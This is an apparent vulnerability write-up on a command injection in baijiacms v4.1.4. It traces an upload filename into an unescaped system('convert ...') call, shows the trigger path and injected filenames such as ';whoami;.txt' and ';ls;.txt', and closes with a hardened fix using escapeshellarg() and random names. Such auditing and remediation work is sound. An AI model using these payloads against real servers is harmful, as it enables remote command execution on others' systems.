[Command Execution] [Baijia Mall CMS (baijiacms) v4.1.4]
Command execution sinks to search the code base for:
system exec shell_exec `` passthru pcntl_exec popen proc_open
1. Locate the system() call in includes/baijiacms/common.inc.php. $quality_command is built from intval(), so it cannot be used for injection.
intval() returns the integer value of a variable, which strips any shell metacharacters.
```php
function file_save($file_tmp_name,$filename,$extention,$file_full_path,$file_relative_path,$allownet=true)
{
    echo $file_full_path;   // debug output added while testing
    $settings=globaSystemSetting();
    if(!file_move($file_tmp_name, $file_full_path))
    {
        return error(-1, '保存上传文件失败');   // "failed to save uploaded file"
    }
    if(!empty($settings['image_compress_scale']))
    {
        $scal=$settings['image_compress_scale'];
        $quality_command='';
        if(intval($scal)>0)
        {
            $quality_command=' -quality '.intval($scal);   // integer only, not injectable
        }
        // $file_full_path is concatenated into the shell command without escaping
        system('convert'.$quality_command.' '.$file_full_path.' '.$file_full_path);
        echo 'convert'.$quality_command.' '.$file_full_path.' '.$file_full_path;   // debug output added while testing (step 4)
    }
    // ... remainder of the function not shown in the write-up
}
```
2. $file_full_path is passed in by the caller of file_save() and only reaches system() once the if condition holds. Searching for the image_compress_scale setting shows that the "image compression ratio" feature (图片压缩比例) must be enabled in the admin template:
system/manager/template/web/netattach.php
```html
<div class="form-group">
    <label class="col-xs-12 col-sm-3 col-md-2 control-label">图片压缩比例<br/>(推荐80%)</label>
    <div class="col-sm-9 col-xs-12">
        <label class="radio-inline">
            <input type="radio" name="image_compress_openscale" value="0" <?php if(empty($settings['image_compress_openscale'])) { ?>checked="true"<?php } ?>> 关闭
        </label><label class="radio-inline">
            <input type="radio" name="image_compress_openscale" value="1" <?php if(!empty($settings['image_compress_openscale'])) { ?>checked="true"<?php } ?>>开启
        </label><label class="radio-inline">
            <input type="text" name="image_compress_scale" style="width:50px" value="<?php echo $settings['image_compress_scale'];?>" />%
        </label>
    </div>
</div>
```

3. How file_save() is reached. Searching for its callers shows that setting.php calls the function directly.
To trigger it, visit http://10.22.56.23:8085/index.php?mod=site&act=weixin&do=setting and upload a file; the source shows that a non-empty .txt file is required:

```php
if (!empty($_FILES['weixin_verify_file']['tmp_name']))
{
    $file=$_FILES['weixin_verify_file'];
    $extention = pathinfo($file['name'], PATHINFO_EXTENSION);
    $extention=strtolower($extention);
    if($extention=='txt')
    {
        $substr=substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/'));
        if(empty( $substr))
        {
            $substr="/";
        }
        $verify_root= substr(WEB_ROOT."/",0, strrpos(WEB_ROOT."/", $substr))."/";
        //file_save($file['tmp_name'],$file['name'],$extention,$verify_root.$file['name'],$verify_root.$file['name'],false);
        // the client-supplied $file['name'] becomes $file_full_path inside file_save()
        file_save($file['tmp_name'],$file['name'],$extention,WEB_ROOT."/".$file['name'],WEB_ROOT."/".$file['name'],false);
    }
}
```
4. Modify the source to print the command that system() executes:

```php
system('convert'.$quality_command.' '.$file_full_path.' '.$file_full_path);
echo 'convert'.$quality_command.' '.$file_full_path.' '.$file_full_path;   // added to show the assembled command
```

Output observed during testing:

```
convert /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/;whoami;.txt /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt
convert /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt
```

5. Renaming the uploaded file to ;ls;.txt makes the injected command run.

Summary of the approach:
The system() call takes two variable parts, $quality_command and $file_full_path. $quality_command cannot be used because of intval(). $file_full_path only reaches system() when the if condition holds, i.e. image_compress_openscale must be non-empty, so the image compression feature in netattach.php has to be enabled. setting.php then calls file_save() with $file['name'] as the path, which gives control of $file_full_path and makes system() execute the injected command.
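As an added example (not baijiacms code), the following hardened version closes both ends of the chain described above: the client-supplied filename from the setting.php upload never becomes part of a path or a shell command, and the convert invocation quotes every argument with escapeshellarg(). The function names, the extension lists and the $upload_dir parameter are assumptions made for this illustration.

```php
<?php
// Added example, not baijiacms code: a hardened replacement for the
// file_save() sink. Function names and the extension lists are assumptions.

// Extensions accepted for upload at all; only image types are ever handed
// to convert, so a .txt verification file never reaches the shell.
const UPLOAD_ALLOWED_EXT = ['txt', 'jpg', 'jpeg', 'png', 'gif'];
const IMAGE_EXT          = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * True when $name is a plain filename: non-empty, no path separators or
 * traversal, and only [A-Za-z0-9._-]. A name such as ";ls;.txt" fails.
 * Also usable on its own as a check over existing uploads or log entries.
 */
function is_safe_filename(string $name): bool
{
    return $name !== '' && $name !== '.' && $name !== '..'
        && preg_match('/^[A-Za-z0-9._-]+$/', $name) === 1;
}

/**
 * Build the on-disk name the server will use. The client name contributes
 * only its (validated) extension; the basename is random, so nothing the
 * client typed is ever concatenated into a path or a command.
 */
function server_side_name(string $client_name): ?string
{
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!in_array($ext, UPLOAD_ALLOWED_EXT, true)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Hardened save. $upload_dir is a fixed server-side directory; $settings is
 * the same array globaSystemSetting() returns in the original code.
 * Returns the stored path, or null when the upload is rejected or fails.
 */
function file_save_hardened(string $tmp_name, string $client_name, string $upload_dir, array $settings): ?string
{
    $name = server_side_name($client_name);
    if ($name === null || !is_uploaded_file($tmp_name)) {
        return null;
    }
    $full_path = rtrim($upload_dir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp_name, $full_path)) {
        return null;
    }

    $ext   = pathinfo($name, PATHINFO_EXTENSION);
    $scale = intval($settings['image_compress_scale'] ?? 0);
    if (!empty($settings['image_compress_openscale']) && $scale > 0 && $scale <= 100
        && in_array($ext, IMAGE_EXT, true)) {
        // $scale is an int and the path is quoted with escapeshellarg(), so
        // the shell sees exactly three arguments whatever the name contains.
        $cmd = 'convert -quality ' . $scale . ' '
             . escapeshellarg($full_path) . ' ' . escapeshellarg($full_path);
        exec($cmd, $output, $status);
        if ($status !== 0) {
            error_log('convert failed for ' . $full_path);
        }
    }
    return $full_path;
}
```

The weixin setting handler would call file_save_hardened($_FILES['weixin_verify_file']['tmp_name'], $_FILES['weixin_verify_file']['name'], WEB_ROOT, $settings) instead of file_save(). Outside a real request is_uploaded_file() returns false by design, so the function refuses anything that did not arrive through the upload mechanism. Keeping the random-name step even though escapeshellarg() alone would neutralise the shell metacharacters means the path is also safe for any later use (logging, links, other tools) that might not quote it.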
